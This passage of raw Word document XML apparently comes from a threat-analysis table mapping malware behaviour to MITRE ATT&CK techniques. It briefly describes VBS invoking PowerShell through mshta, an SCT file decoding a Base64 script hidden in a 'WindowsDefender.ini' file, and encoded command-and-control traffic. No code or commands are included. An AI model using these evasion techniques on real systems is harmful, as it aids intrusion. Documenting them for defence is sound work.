              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009D6782">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009D6782">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09C3E8E4" w14:textId="52083833" w:rsidR="00C25C73" w:rsidRPr="00FF3672" w:rsidRDefault="00C25C73" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C25C73">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1218.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C25C73">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C25C73">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BCA2AF3" w14:textId="3D1DF797" w:rsidR="00C25C73" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55DE87FD" w14:textId="77777777" w:rsidR="00C25C73" w:rsidRPr="00B857D7" w:rsidRDefault="00C25C73" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5513DB56" w14:textId="444AF3DF" w:rsidR="00C25C73" w:rsidRDefault="00C25C73" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75D257B1" w14:textId="304F036E" w:rsidR="00C25C73" w:rsidRPr="00B857D7" w:rsidRDefault="0081379E" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0081379E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="217B1F42" w14:textId="052C747D" w:rsidR="00C25C73" w:rsidRPr="00B857D7" w:rsidRDefault="00514FB1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8482C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidRPr="00765632">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>One such example of the VBS invoking PowerShell via MSHTA is shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00633C6C" w:rsidRPr="00B857D7" w14:paraId="431F73E1" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21D2ED4C" w14:textId="2172EF0B" w:rsidR="00633C6C" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33E64032" w14:textId="756D964D" w:rsidR="00633C6C" w:rsidRPr="00B857D7" w:rsidRDefault="00633C6C" w:rsidP="002B57F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430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="233991DC" w14:textId="293A9DA1" w:rsidR="00633C6C" w:rsidRPr="00FF3672" w:rsidRDefault="00633C6C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00633C6C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="729D7AA3" w14:textId="01D6D1A1" w:rsidR="00633C6C" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E76B7A1" w14:textId="77777777" w:rsidR="00633C6C" w:rsidRPr="00B857D7" w:rsidRDefault="00633C6C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6F4B11" w14:textId="48BDEF65" w:rsidR="00633C6C" w:rsidRDefault="00633C6C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="079FB222" w14:textId="3B298BE2" w:rsidR="00633C6C" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1481657F" w14:textId="37490B87" w:rsidR="00633C6C" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8482C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="00260243" w:rsidRPr="00260243">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:color w:val="auto"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF3672" w:rsidRPr="00B857D7" w14:paraId="2108040A" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09134474" w14:textId="683D5101" w:rsidR="00FF3672" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4335D9BA" w14:textId="3A014DC6" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00FF3672" w:rsidP="002B57F6">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430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03EE8845" w14:textId="25293927" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00FF3672" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00FF3672">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00FF3672">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70EE6E6B" w14:textId="6E20179D" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060EF749" w14:textId="77777777" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00FF3672" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07315B1A" w14:textId="026CED3F" w:rsidR="00FF3672" w:rsidRDefault="000F2CD9" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B80B509" w14:textId="3D556B6B" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63ADE3C6" w14:textId="68200118" w:rsidR="00FF3672" w:rsidRPr="00B857D7" w:rsidRDefault="00B8482C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B8482C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496BEF" w:rsidRPr="00B857D7" w14:paraId="5765B072" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C100957" w14:textId="6EB95BE6" w:rsidR="00496BEF" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E4322E7" w14:textId="052FB764" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="109EB8A9" w14:textId="408F6736" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1132.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Data Encoding&gt;:Standard Encoding </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="341EDC79" w14:textId="3D535265" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EFCE6D3" w14:textId="77777777" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="672FF076" w14:textId="0A431A9C" w:rsidR="00496BEF" w:rsidRDefault="00B8482C" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3528C778" w14:textId="33639ECC" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00B80DF1" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2164" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78790FF2" w14:textId="564BC7B9" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] Two approaches to message encoding provided in text below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496BEF" w:rsidRPr="00B857D7" w14:paraId="228E9193" w14:textId="77777777" w:rsidTr="00A86605">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="785F4D0C" w14:textId="016B6EFF" w:rsidR="00496BEF" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E40D7B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B1BC4A9" w14:textId="40C87C4A" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2430" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7354789C" w14:textId="481AFF05" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00496BEF" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00496BEF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA3E433" w14:textId="10C288D2" w:rsidR="00496BEF" w:rsidRPr="00B857D7" w:rsidRDefault="00E40D7B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
